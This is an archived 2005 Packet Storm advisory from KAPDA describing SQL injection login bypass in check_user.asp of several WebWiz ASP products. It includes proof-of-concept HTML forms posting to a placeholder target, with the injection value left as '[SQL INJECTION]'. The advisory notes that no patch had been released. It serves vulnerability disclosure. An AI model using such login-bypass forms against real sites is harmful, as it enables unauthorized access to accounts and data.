kapda-18.txt

2005-12-31T00:00:00
ID PACKETSTORM:42708
Type packetstorm
Reporter DevilBox
Modified 2005-12-31T00:00:00

Description

                                        
                                            ` [KAPDA::#18] - WebWiz Products SQL Injection  
  
Happy new year ! :)  
KAPDA New advisory  
  
Vulnerable products :  
  
webwiz site news access2000 : vesion 3.06 and prior versions  
webwiz journal access2000 : version 1.0  
webwiz weekly poll access2000 : version 3.06 and prior versions  
database login access2000 : version 1.71 and prior versions  
webwiz site news access97 : version 3.06 and prior versions  
webwiz journal access97 : version 1.0  
webwiz weekly poll access97 : version 3.06 and prior versions  
database login access97 : version 1.71 and prior versions  
  
Vendor: http://www.webwizguide.info  
  
Risk: High  
  
Vulnerability: SQL_Injection  
  
Date :  
--------------------  
Found : Aug 14 2005  
Vendor Contacted : Dec 30 2005  
Release Date : Dec 30 2005  
  
About WebWiz Products :  
--------------------  
Vendor`s description  
  
WebWiz site news : http://webwizguide.info/asp/sample_scripts/site_news_script.asp  
WebWiz journal : http://webwizguide.info/asp/sample_scripts/journal_application.asp  
WebWiz weekly poll : http://webwizguide.info/asp/sample_scripts/weekly_poll_script.asp  
WebWiz Password Login Page (Database Login) : http://webwizguide.info/asp/sample_scripts/database_login_script.asp  
  
Discussion :  
----------------  
Some input passed to "check_user.asp" when logging in isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.  
  
Vulnerabilities:  
--------------------  
SQL_Injection in "/[product]/check_user.asp" .  
At parameter named 'txtUserName', Attacker can enter SQL command to login to the system.(For all products)  
  
Proof of Concepts:  
--------------------  
  
<html>  
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>  
<p> Discovery and exploit by devil_box [at} kapda.ir</p>  
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers  
Institute  
of Iran</a></p>  
<form method="POST" action="http://target/[product]/check_user.asp">  
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">  
<input type="hidden" name="txtUserPass" value="1">  
<input type="submit" value="Submit" name="submit">  
</form></html>  
  
<html>  
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>  
<p> Discovery and exploit by devil_box [at} kapda.ir</p>  
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers  
Institute  
of Iran</a></p>  
<form method="POST" action="http://target/[product]/check_user.asp">  
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">  
<input type="hidden" name="txtUserPass" value="1">  
<input type="submit" value="Submit" name="submit">  
</form></html>  
  
Solution:  
--------------------  
No patch`s released yet by vendor.  
  
Original Advisory:  
--------------------  
http://www.kapda.ir/advisory-167.html  
  
Credit :  
--------------------  
DevilBox of KAPDA  
devil_box [at} kapda.ir  
Kapda - Security Science Researchers Insitute of Iran  
http://www.KAPDA.ir  
`